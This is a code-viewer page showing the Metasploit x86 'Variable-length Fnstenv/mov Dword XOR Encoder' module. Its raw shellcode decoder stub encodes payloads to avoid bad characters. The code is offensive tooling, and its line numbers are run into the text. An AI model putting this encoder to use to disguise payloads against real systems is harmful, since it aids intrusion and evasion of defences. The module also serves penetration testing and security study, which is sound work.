Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/encoders/x86/fnstenv_mov.rb
Views: 11777
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::Xor67def initialize8super(9'Name' => 'Variable-length Fnstenv/mov Dword XOR Encoder',10'Description' => %q{11This encoder uses a variable-length mov equivalent instruction12with fnstenv for getip.13},14'Author' => 'spoonm',15'Arch' => ARCH_X86,16'License' => MSF_LICENSE,17'Decoder' =>18{19'KeySize' => 4,20'BlockSize' => 4,21})22end2324#25# Returns the decoder stub that is adjusted for the size of the buffer26# being encoded.27#28def decoder_stub(state)2930# Sanity check that saved_registers doesn't overlap with modified_registers31if (modified_registers & saved_registers).length > 032raise BadGenerateError33end3435decoder =36Rex::Arch::X86.set(37Rex::Arch::X86::ECX,38(((state.buf.length - 1) / 4) + 1),39state.badchars) +40"\xd9\xee" + # fldz41"\xd9\x74\x24\xf4" + # fnstenv [esp - 12]42"\x5b" + # pop ebx43"\x81\x73\x13XORK" + # xor_xor: xor DWORD [ebx + 22], xorkey44"\x83\xeb\xfc" + # sub ebx,-445"\xe2\xf4" # loop xor_xor4647state.decoder_key_offset = decoder.index('XORK')4849return decoder50end5152# Indicate that this module can preserve some registers53def can_preserve_registers?54true55end5657# A list of registers always touched by this encoder58def modified_registers59[ Rex::Arch::X86::EBX, Rex::Arch::X86::ECX ]60end6162# Convert the SaveRegisters to an array of x86 register constants63def saved_registers64Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])65end66end676869